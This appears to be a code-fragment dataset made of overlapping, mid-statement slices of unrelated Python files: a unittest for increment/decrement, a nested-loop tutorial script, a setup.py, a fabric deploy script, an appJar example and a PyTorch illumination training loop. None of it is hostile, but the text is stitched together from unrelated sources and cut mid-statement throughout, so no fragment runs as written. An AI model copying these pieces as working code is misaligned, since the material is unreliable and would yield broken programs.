"import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3),",
"def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__ == '__main__': unittest.main()",
"inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__",
"= True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def",
"class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__ ==",
"import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if",
"sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4)",
"import sys sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self):",
"Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__ == '__main__':",
"unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2)",
"<gh_stars>0 import sys sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def"
] |
[
"here not reacheable since following 'if' -> 'else'.\") print(\"Just finished all the 'y'",
"x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\") if y ==",
"end of y:{y} loop.\" ) # print(\"Will this start at beginning of 'y'",
"# Second edit. # Added feature_01. # Create two nested 'for' loops. for",
"finished all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished all",
"edit. # Added feature_01. # Create two nested 'for' loops. for x in",
"'if' -> 'else'. print(\"Code here not reacheable since following 'if' -> 'else'.\") print(\"Just",
"loop.\") if y == 3: print(x, y, 'breaking') # print(\"Only 'break' out of",
"-> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\")",
"y in range(1,5): print(f\"Start of y:{y} loop.\") if y == 3: print(x, y,",
"the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished all the 'x'",
"range(1,5): print(f\"Start of y:{y} loop.\") if y == 3: print(x, y, 'breaking') #",
"'for' loops. for x in range(1,5): print(f\"Start of x:{x} loop.\") for y in",
"'break' out of inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA end",
"# Added feature_01. # Create two nested 'for' loops. for x in range(1,5):",
"reacheable since following 'if' -> 'else'. print(\"Code here not reacheable since following 'if'",
"loops. for x in range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5):",
"of inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA end of y:{y}",
"# print(\"Will this start at beginning of 'y' loop?\") continue # Code here",
"'else'. print(\"Code here not reacheable since following 'if' -> 'else'.\") print(\"Just finished all",
"print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished",
"# Code here not reacheable since following 'if' -> 'else'. print(\"Code here not",
"two nested 'for' loops. for x in range(1,5): print(f\"Start of x:{x} loop.\") for",
"following 'if' -> 'else'. print(\"Code here not reacheable since following 'if' -> 'else'.\")",
"print(\"Will this start at beginning of 'y' loop?\") continue # Code here not",
"feature_01. # Create two nested 'for' loops. for x in range(1,5): print(f\"Start of",
"x in range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start of",
"Create two nested 'for' loops. for x in range(1,5): print(f\"Start of x:{x} loop.\")",
"range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\")",
"not reacheable since following 'if' -> 'else'. print(\"Code here not reacheable since following",
"loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\") if y == 3:",
"this start at beginning of 'y' loop?\") continue # Code here not reacheable",
"here not reacheable since following 'if' -> 'else'. print(\"Code here not reacheable since",
"of y:{y} loop.\") if y == 3: print(x, y, 'breaking') # print(\"Only 'break'",
") # print(\"Will this start at beginning of 'y' loop?\") continue # Code",
"not reacheable since following 'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\")",
"since following 'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just",
"Added feature_01. # Create two nested 'for' loops. for x in range(1,5): print(f\"Start",
"y, f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will this start at",
"in range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y}",
"in range(1,5): print(f\"Start of y:{y} loop.\") if y == 3: print(x, y, 'breaking')",
"print(f\"Start of y:{y} loop.\") if y == 3: print(x, y, 'breaking') # print(\"Only",
"loop.\") break else: print(x, y, f\"continuing. AKA end of y:{y} loop.\" ) #",
"if y == 3: print(x, y, 'breaking') # print(\"Only 'break' out of inner",
"at beginning of 'y' loop?\") continue # Code here not reacheable since following",
"-> 'else'. print(\"Code here not reacheable since following 'if' -> 'else'.\") print(\"Just finished",
"of y:{y} loop.\" ) # print(\"Will this start at beginning of 'y' loop?\")",
"print(x, y, 'breaking') # print(\"Only 'break' out of inner 'y' loop.\") break else:",
"print(\"Code here not reacheable since following 'if' -> 'else'.\") print(\"Just finished all the",
"print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\") if",
"y == 3: print(x, y, 'breaking') # print(\"Only 'break' out of inner 'y'",
"since following 'if' -> 'else'. print(\"Code here not reacheable since following 'if' ->",
"== 3: print(x, y, 'breaking') # print(\"Only 'break' out of inner 'y' loop.\")",
"of 'y' loop?\") continue # Code here not reacheable since following 'if' ->",
"'breaking') # print(\"Only 'break' out of inner 'y' loop.\") break else: print(x, y,",
"following 'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished",
"'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished all the 'x' loops.\")",
"continue # Code here not reacheable since following 'if' -> 'else'. print(\"Code here",
"'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just",
"loop.\" ) # print(\"Will this start at beginning of 'y' loop?\") continue #",
"print(\"Only 'break' out of inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA",
"# Create two nested 'for' loops. for x in range(1,5): print(f\"Start of x:{x}",
"y:{y} loop.\" ) # print(\"Will this start at beginning of 'y' loop?\") continue",
"out of inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA end of",
"3: print(x, y, 'breaking') # print(\"Only 'break' out of inner 'y' loop.\") break",
"nested 'for' loops. for x in range(1,5): print(f\"Start of x:{x} loop.\") for y",
"y, 'breaking') # print(\"Only 'break' out of inner 'y' loop.\") break else: print(x,",
"y:{y} loop.\") if y == 3: print(x, y, 'breaking') # print(\"Only 'break' out",
"Code here not reacheable since following 'if' -> 'else'. print(\"Code here not reacheable",
"f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will this start at beginning",
"break else: print(x, y, f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will",
"start at beginning of 'y' loop?\") continue # Code here not reacheable since",
"for x in range(1,5): print(f\"Start of x:{x} loop.\") for y in range(1,5): print(f\"Start",
"Second edit. # Added feature_01. # Create two nested 'for' loops. for x",
"loop?\") continue # Code here not reacheable since following 'if' -> 'else'. print(\"Code",
"'y' loop.\") break else: print(x, y, f\"continuing. AKA end of y:{y} loop.\" )",
"reacheable since following 'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also,",
"inner 'y' loop.\") break else: print(x, y, f\"continuing. AKA end of y:{y} loop.\"",
"AKA end of y:{y} loop.\" ) # print(\"Will this start at beginning of",
"beginning of 'y' loop?\") continue # Code here not reacheable since following 'if'",
"else: print(x, y, f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will this",
"# print(\"Only 'break' out of inner 'y' loop.\") break else: print(x, y, f\"continuing.",
"for y in range(1,5): print(f\"Start of y:{y} loop.\") if y == 3: print(x,",
"'y' loop?\") continue # Code here not reacheable since following 'if' -> 'else'.",
"all the 'y' loops.\") print(f\"Also, just finished x:{x} loop.\") print(\"Just finished all the",
"of x:{x} loop.\") for y in range(1,5): print(f\"Start of y:{y} loop.\") if y",
"'if' -> 'else'.\") print(\"Just finished all the 'y' loops.\") print(f\"Also, just finished x:{x}",
"print(x, y, f\"continuing. AKA end of y:{y} loop.\" ) # print(\"Will this start"
] |
[
"packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT',",
"import setup, find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']),",
"<reponame>timniven/hsdbi<gh_stars>0 from setuptools import setup, find_packages # python setup.py sdist upload -r pypi",
"Development :: Libraries :: Python Modules', 'Programming Language :: Python :: 3', 'License",
"Python :: 3', 'License :: OSI Approved :: MIT License', ], keywords='database interface",
"name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz',",
"'Programming Language :: Python :: 3', 'License :: OSI Approved :: MIT License',",
":: 3', 'License :: OSI Approved :: MIT License', ], keywords='database interface facade',",
"3', 'License :: OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[",
"Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development",
"upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.',",
"Audience :: Developers', 'Topic :: Software Development :: Libraries :: Python Modules', 'Programming",
"'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries :: Python Modules',",
"pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>',",
"setuptools import setup, find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi',",
"Modules', 'Programming Language :: Python :: 3', 'License :: OSI Approved :: MIT",
"Libraries :: Python Modules', 'Programming Language :: Python :: 3', 'License :: OSI",
"author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience",
"interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status ::",
"# python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple",
"sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing",
"setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi',",
"accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 -",
"'Topic :: Software Development :: Libraries :: Python Modules', 'Programming Language :: Python",
":: Software Development :: Libraries :: Python Modules', 'Programming Language :: Python ::",
"databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha',",
":: Python Modules', 'Programming Language :: Python :: 3', 'License :: OSI Approved",
"- Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries ::",
"'License :: OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo',",
"download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers',",
"Language :: Python :: 3', 'License :: OSI Approved :: MIT License', ],",
"3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries",
":: Python :: 3', 'License :: OSI Approved :: MIT License', ], keywords='database",
"classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic ::",
"find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A",
"version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[",
":: Developers', 'Topic :: Software Development :: Libraries :: Python Modules', 'Programming Language",
":: Libraries :: Python Modules', 'Programming Language :: Python :: 3', 'License ::",
"for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3",
"'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software",
"setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for",
"Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries :: Python",
"simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status",
"setup, find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18',",
"python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface",
"Developers', 'Topic :: Software Development :: Libraries :: Python Modules', 'Programming Language ::",
"Software Development :: Libraries :: Python Modules', 'Programming Language :: Python :: 3',",
"url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience ::",
":: OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo', 'sqlalchemy'",
"-r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>',",
"Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo', 'sqlalchemy' ] )",
"OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo', 'sqlalchemy' ]",
"from setuptools import setup, find_packages # python setup.py sdist upload -r pypi setup(",
"author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended",
"Python Modules', 'Programming Language :: Python :: 3', 'License :: OSI Approved ::",
":: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development ::",
"description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development",
"license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic"
] |
[
"sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp",
"cp.get('install','location') == 'local': run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op))",
"SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy(): #",
"lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL =",
"cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd = lcd def lsudo(op):",
"fabric.operations import run, sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers",
"from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser()",
"ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location')",
"local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J =",
"from fabric.decorators import task from fabric.operations import run, sudo, local from ConfigParser import",
"import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') ==",
"lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J",
"task from fabric.operations import run, sudo, local from ConfigParser import ConfigParser import geospatial",
"= lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def",
"if cp.get('install','location') == 'local': run = local cd = lcd def lsudo(op): local('sudo",
"'local': run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo =",
"{0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j')",
"import ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if",
"= ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd = lcd",
"= lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL",
"cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy(): # geospatial.install_hdf() geospatial.install_netCDF4()",
"run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo",
"fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run =",
"import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local",
"def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install')",
"lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy():",
"cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src')",
"run, sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd",
"import run, sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import",
"cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd =",
"geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local':",
"local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp =",
"lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd",
"ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd = lcd def",
"== 'local': run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo",
"sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True)",
"= cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy(): # geospatial.install_hdf()",
"fabric.decorators import task from fabric.operations import run, sudo, local from ConfigParser import ConfigParser",
"from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run",
"= local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC",
"local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC =",
"ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg')",
"import task from fabric.operations import run, sudo, local from ConfigParser import ConfigParser import",
"from fabric.operations import run, sudo, local from ConfigParser import ConfigParser import geospatial from"
] |
[
"app = gui() # top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to",
"from appJar import gui app = gui() # top slice - CREATE the",
"# add a label app.setLabelBg(\"title\", \"red\") # set the label's background to be",
"CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\")",
"label app.setLabelBg(\"title\", \"red\") # set the label's background to be red app.go() #",
"a label app.setLabelBg(\"title\", \"red\") # set the label's background to be red app.go()",
"the label's background to be red app.go() # bottom slice - START the",
"= gui() # top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\")",
"<filename>examples/simpleApp.py # import the library from appJar import gui app = gui() #",
"the library from appJar import gui app = gui() # top slice -",
"\"red\") # set the label's background to be red app.go() # bottom slice",
"set the label's background to be red app.go() # bottom slice - START",
"the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\") #",
"label's background to be red app.go() # bottom slice - START the GUI",
"- CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\",",
"import the library from appJar import gui app = gui() # top slice",
"library from appJar import gui app = gui() # top slice - CREATE",
"app.setLabelBg(\"title\", \"red\") # set the label's background to be red app.go() # bottom",
"to appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set the label's background",
"top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a",
"# set the label's background to be red app.go() # bottom slice -",
"slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label",
"GUI app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set",
"add a label app.setLabelBg(\"title\", \"red\") # set the label's background to be red",
"# import the library from appJar import gui app = gui() # top",
"app.addLabel(\"title\", \"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set the",
"import gui app = gui() # top slice - CREATE the GUI app.addLabel(\"title\",",
"appJar import gui app = gui() # top slice - CREATE the GUI",
"# top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") # add",
"gui app = gui() # top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome",
"gui() # top slice - CREATE the GUI app.addLabel(\"title\", \"Welcome to appJar\") #",
"\"Welcome to appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set the label's",
"appJar\") # add a label app.setLabelBg(\"title\", \"red\") # set the label's background to"
] |
[] |
[
"parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training",
"np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1,",
"roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3',",
"= dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu =",
"param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList",
"g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch,",
"gpus used for training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the",
"3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination()",
").data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut",
"0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch",
"parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we use') opt =",
"imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global",
"depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of",
"np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for",
", '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment,",
"'{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n in range(0, opt.cascadeLevel",
") ############## ###################### # Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId)",
"in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in",
"albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu",
"utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1 or j",
"default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size')",
"n) ) trainingLog.close() # Update the training rate if (epoch + 1) %",
"(epoch + 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /=",
"illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether",
"globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype",
"= 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25)",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch",
"assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment)",
"network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination",
"opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize,",
"j == 1 or j == 1000 or j% 2000 == 0: #",
"j == 1000 or j% 2000 == 0: # Save the ground truth",
"= globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum =",
"'{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate if (epoch +",
"param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment,",
"opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' %",
"models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId)",
"globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch,",
"dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch",
"help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network') #",
"opt.epochId) ) ) ############## ###################### # Send things into GPU if opt.cuda: albedoBatch",
"= sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step()",
